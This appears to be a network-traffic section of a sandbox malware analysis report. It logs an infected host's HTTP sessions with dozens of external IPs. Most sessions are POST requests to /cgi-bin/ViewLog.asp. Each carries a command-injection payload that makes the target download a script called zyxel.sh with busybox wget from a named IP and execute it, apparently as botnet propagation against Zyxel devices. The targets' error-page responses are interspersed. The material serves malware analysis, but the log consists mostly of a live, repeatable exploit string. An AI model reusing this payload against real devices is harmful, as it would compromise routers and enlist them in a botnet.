20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .statu
                                                            Feb 14, 2024 09:28:20.386405945 CET1286INData Raw: 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: s-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional
                                                            Feb 14, 2024 09:28:20.386434078 CET1286INData Raw: 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20
                                                            Data Ascii: .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                            Feb 14, 2024 09:28:20.386462927 CET1286INData Raw: 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                            Data Ascii: } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left;
                                                            Feb 14, 2024 09:28:20.386482000 CET1286INData Raw: 62 61 6b 73 61 79 62 53 78 44 43 41 34 53 54 46 2b 77 67 38 72 48 37 45 7a 4d 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46
                                                            Data Ascii: baksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQ
                                                            Feb 14, 2024 09:28:20.386545897 CET1286INData Raw: 55 7a 6c 43 4f 4d 79 69 39 5a 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69
                                                            Data Ascii: UzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZz
                                                            Feb 14, 2024 09:28:20.386576891 CET1171INData Raw: 63 4e 44 4a 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f
                                                            Data Ascii: cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeC
                                                            Feb 14, 2024 09:28:20.386611938 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to 95.173.180.74's <a href="mailto:teknik@ni.net.tr?s
                                                            Feb 14, 2024 09:28:20.386631012 CET339INData Raw: 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPanel, Inc.<


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            227192.168.2.235895831.200.93.348080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.559791088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            228192.168.2.233523494.123.25.238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.559840918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            229192.168.2.234916494.123.56.528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.559870958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            230192.168.2.235754631.200.74.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.559901953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            231192.168.2.233602894.122.125.1038080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.559937000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            232192.168.2.235010885.133.241.1888080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.590763092 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.113018036 CET139INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Cache-Control: private
                                                            Content-Length: 0
                                                            Date: Wed, 14 Feb 2024 08:28:20 GMT


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            233192.168.2.235051695.216.46.1280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.712341070 CET19INData Raw: 15 03 03 00 02 02 32
                                                            Data Ascii: 2


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            234192.168.2.234784262.153.173.328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.018873930 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            235192.168.2.234096862.171.189.2028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.023503065 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            236192.168.2.233348295.198.160.578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.031280041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.261050940 CET404INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 09:28:19 GMT
                                                            Server: TruVision
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            X-FRAME-OPTIONS: SAMEORIGIN
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            237192.168.2.234956494.123.134.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.058779955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            238192.168.2.233876094.120.109.1038080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.060729027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            239192.168.2.233367494.122.198.2468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.064153910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            240192.168.2.235013285.133.241.1888080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.360028028 CET139INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Cache-Control: private
                                                            Content-Length: 0
                                                            Date: Wed, 14 Feb 2024 08:28:21 GMT


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            241192.168.2.235200631.201.191.1648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.532468081 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.750185013 CET626INHTTP/1.1 404
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 431
                                                            Date: Wed, 14 Feb 2024 08:28:21 GMT
                                                            Keep-Alive: timeout=5
                                                            Connection: keep-alive
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            242192.168.2.235577831.33.9.568080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.762514114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:24.767960072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            243192.168.2.233778095.111.235.1638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.776268005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            244192.168.2.235017094.211.59.1908080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.789778948 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            245192.168.2.235752294.120.52.1318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.815016031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            246192.168.2.233436694.122.223.2528080
